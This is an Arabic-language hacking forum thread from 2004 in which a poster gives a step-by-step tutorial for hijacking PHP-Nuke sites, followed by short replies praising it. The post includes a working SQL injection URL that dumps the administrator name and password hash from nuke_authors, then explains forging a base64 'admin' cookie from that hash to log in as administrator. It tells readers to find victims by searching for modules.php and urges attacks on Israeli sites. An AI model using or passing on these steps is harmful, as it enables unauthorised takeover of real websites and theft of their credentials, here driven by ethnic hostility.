المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : اخيرا تعالو تكوو معي ورا المجلات !!


متكي ورا الشمس
12-08-2004, 06:15
السلام عليكم ورحمة الله وبركاته :
اتشرف اني اطرح هذا الموضوع للعاصفه حصريا
بصراحع ياشباب مدري وشلون ابدا بس الصراحه كم مره القا مواضيع عن ثغرات البي اتش بي نيوك ولـــــكن

من يفك md5 ??!! عارف تبطون والله|2|
ولكن <<بدا بالفلسفه
انا لقيت موضوع انقليزي في منتدى waraxe
اذا تعرفونه متخصص في ذا المجلات المهم اني حاولت اقرا وخبطت الين فهمت اللي فهمته وانا بحاول ابسط لكم الدرس بحيث انكم ماتحتاجون فك شفره للمجلات .
بكذا انتهينا من المعلومات نبدا في الدرس :
اول شي اللي يبي رابط الموضوع
http://www.waraxe.us/forum/viewtopic.php?t=61
ثاني شي اقولكم لازم تنزلون متصفح مزولا :D وهذا رابط التحميل
http://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.7.2/mozilla-win32-1.7.2-installer.exe

عقب ماتنزلونه ابعطيكم معلومه عن الكوكيز تبعه يكون على هذا المسار في الوندز حقك
C:\Documents and Settings\nobody\Application Data\Mozilla\Profiles\[some subfolders]\&@#&@#&@#&@#&@#&@#s.txt
هذا اذا كان xp
اما 98 مثل اللي عندي |6|
كذا C:\WINDOWS\Application Data\Mozilla\Profiles\default\59nyzdoh.slt
المهم بعد ماعرفنا الكوكيز وين يكون
تذكرون البرنامج حق المنتديات كوكيز اديتر مدري وش اسمه
ايه هذا شغلوه واضغطو نت سكيب يعني المتصفح الثاني ويطلع لكم الكوكيز حق الموزلا
الحين عرفتو كيف شغلت الكوكيز
طيب نروح لـ
absba.com
|2|:D
لالا امزح لاحد يروح لا امزع رقبته|13|
روح لاي موقع يهودي في بي اتش بي نيوك بعلمكم حركه فله لاتبحثون في جوجول عن بي اتش بي نيوك ابحثو عن modules.php بيطلع لكم المجلات نقو الضحيه واهجمو عليه بثغره هذي
http://www.example.il.co/modules.php?name=Search&type=stories&query=f00bar&category=-1&categ= and 1=2 UNION SELECT 0,0,aid,pwd,0,0,0,0,0,0 from nuke_authors/*
بيطلع لكم اسم المشرف العام والباسورد مشفر
الحين رح بالمازولا وسجل عادي كعضو بعدين رح لبرنامج الكوكيز بتلقا اسم الموقع ومكتوب قدامه يوزر يعني مستخدم عادي
بيطلع شي يشبه كذا

www.target.com FALSE / FALSE 1114433252 user NTgwOndhcmF4ZTozOTc5Yzf0MjQzZmFkY2MwpjBkYjk2YjdmZG Q0Y2FhMzoxMDo6MDowOjA6MDo6NDA5Ng%3D%3D

معناته ان ذا الخرابيط هي اسم المستخدم والباسورد المشفر تروح لذا الموقع
http://base64-encoder-online.waraxe.us/base64/base64-encoder.php
وتحط
مثال
mranderson:098f4bcd4621d373caae4e832628b4f6
اسم المستخدم للادمن وكلمه المرور
وتضغط على Encode"
بيطلع شي زي كذا

bXJhbmRlcnNvbjowOThmNGJjZDQ2MjFkMzczY2FhZTRlODMyNj I4YjRmNg==
بدال = = تحط اللي في اخر التشفير اللي فوق حقهم %3D%3D
عشان يكون كذا
bXJhbmRlcnNvbjowOThmNGJjZDQ2MjFkMzczY2FhZTRlODMyNj I4YjRmNg%3D%3D
الحين بعد ماضبطنا معلومات الادمن
نروح لمعلوماتك اللي هي يوزر زي كذا

www.target.com FALSE / FALSE 1114433252 user NTgwOndhcmF4ZTozOTc5Yzf0MjQzZmFkY2MwpjBkYjk2YjdmZG Q0Y2FhMzoxMDo6MDowOjA6MDo6NDA5Ng%3D%3D

ونخليها كذا

www.target.com FALSE / FALSE 1114433252 admin bXJhbmRlcnNvbjowOThmNGJjZDQ2MjFkMzczY2FhZTRlODMyNj I4YjRmNg%3D%3D

حيث انا غيرناه الى ادمن
وحطينا خرابيط الادمن !!
بعدين سو حفظ للمعلومات وبعدين سكر المتصفحات ورح للموقع وشف وش صرت
|10||12|

اي خدمات تامرون امر ؟!

مع تحيات
متكي ورا الشمس
جميع الحقوق محفوظه

Super_RedHat
12-08-2004, 08:58
جميل جدا وشكرا لك المعلومة وصلة

القـــانون
13-08-2004, 01:02
مجهود حلو وإستمر عزيزي ...

شبح الليل
13-08-2004, 01:22
مجهود حلو وإستمر عزيزي ...
مجهود حلو وإستمر عزيزي ...

متكي ورا الشمس
13-08-2004, 01:26
اشكركم اعزائي على هذا الشعور المتواضع والمشجع :d

اي احد عنده تعقيب لامانع :d ترى الموضوع مفتوح للجميع للمناقشه